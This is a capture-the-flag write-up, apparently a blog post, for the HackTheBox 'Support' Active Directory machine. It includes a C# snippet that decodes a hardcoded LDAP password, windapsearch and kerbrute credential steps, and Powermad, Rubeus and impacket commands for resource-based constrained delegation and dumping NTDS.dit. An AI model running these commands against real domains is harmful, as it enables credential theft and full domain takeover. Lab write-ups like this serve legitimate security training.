HackTheBox — Support

ARZ101
7 min readDec 17, 2022

Support form HackTheBox was an easy rated AD machine which involved enumerating SMB share to find a custom exe which was authenticating to LDAP, on either reversing or analyzing the traffic from the exe we can find the password for ldap user, having access to ldap service we can find the password for support user by checking the attributes, being in Shared Support group, it had GenericAll on the DC which means we can perform Resource Based Constrained Delegation (RCBD) to impersonate as the administrator.

NMAP

Nmap scan report for 10.10.11.174
Host is up (0.14s latency).
Not shown: 989 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-30 19:01:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped

From the nmap scan we can see port 88 is running which means this is a domain controller, we can also see the domain name support.htb so adding this in /etc/hosts file

PORT 139/445 (SMB)

Checking for null authentication on smb, we can see few shares

Accessing support-tools share we can see some tools there like wireshark, putty, sysinternals and etc

I tried downloading SysinternalsSuite.zip with get but it wasn't working maybe there's a limit to transfer file with larget size but this was around 48 MB, it could be timing as it's taking some to time to transfer the file and the default time out for smbclient is 20 seconds

After increasing timeout, the transfer worked

But that archive didn’t had anything as I was expecting it to have something, moving on to UserInfo.exe.zip

This has dll and exe which we can try to analyze with either ILspy or dnspy and for that let's move to windows machine

On opening UserInfo.exe with ILspy we can find the username support in LdapQuery function also we can see another function being called getPassword which returns the password, we can also get the username which is ldap

Checking the getPassword function we can see how it’s returning the plain text password for support user by using the value from enc_password and the key

We can get the plain text password by simply printing the string returned from the function

using System;
using System.Text;
namespace uwu {
class Program {
static void Main(string[] args) {
string enc_password="0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
byte[] key = Encoding.ASCII.GetBytes("armando");
byte[] array = Convert.FromBase64String(enc_password);
byte[] array2 = array;
for (int i = 0; i < array.Length; i++)
{
array2[i] = (byte)((uint)(array[i] ^ key[i % key.Length]) ^ 0xDFu);
}
Console.WriteLine(Encoding.Default.GetString(array2));
}
}
}

The credentials can also be retrieved by running userinfo.exe and sniffing the packets with wireshark on the interface

Foothold

Having the credentials we can try to dump usernames from windapsearch

windapsearch -d support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --dc 10.10.11.174
--module users

The usernames can be sorted with awk

windapsearch -d support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --dc 10.10.11.174 --module users | grep "sAMAccountName" | awk -F ': ' '{print $2}' > user_names.txt

Having the usernames, we can try password spary with kerbrute

Using windapsearach with --full option we can list every attribute set on user objects which will show the password for support user

The credentials can be verified with cme on winrm

This shows Pwn3d! which means that we can use the credentials on winrm to get a shell

Having a shell I ran PowerUp script which didn't showed any thing

Next I tried using Sharphound to gather domain data

Privilege Escalation

Uploading json files to bloodhound, Shared Support Account group which support is a member of has Generical All on the domain controller

This means we have can have complete control over the domain controller by first adding a new computer account with Powermad and abusing write privilege on dc.support.htb to add msDS-AllowedToActOnBehalfOfOtherIdentity which will allow our new machine account to impersonate as any user from the domain to access the domain controller

New-MachineAccount -MachineAccount UwU -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Ver
bos

Using Active Directory Module we can set msDS-AllowedToActOnBehalfOfOtherIdentity

Set-ADComputer dc -PrincipalsAllowedToDelegateToAccount UwU$
Get-ADComputer dc -Properties PrincipalsAllowedToDelegateToAccount

Now to get a S4U hash to impersonate as administrator with Rubeus

Rubeus.exe s4u /user:UwU$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /nowrap

Even tho we have injected the impersonated ticket for administrator with /ptt pass the ticket still we won't be able to access c$ share or launch cmd with psexec as we need local administrator to do that

So instead we can copy the the ticket from rubeus which gets generated in .kirbi format which we can convert into .ccache and use it with impacket

Rubeus.exe s4u /user:UwU$ /password:123456 /domain:support.htb /impersonateuser:administrator /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /msdsspn:host/dc.support.htb /nowrap

Copy the hash, base64 decode it and covert it with ticketConverter.py

Or we can request a service ticket with impacket’s getST and use either psexec , wmiexec or smbexec to get a shell

getST.py -spn cifs/dc.support.htb support.htb/UwU\$ -impersonate administrator

Running secretsdump.py to dump NTDS.dit which contains domain user's hashes

With the administrator’s hash we can also perform pass the hash

References

--

--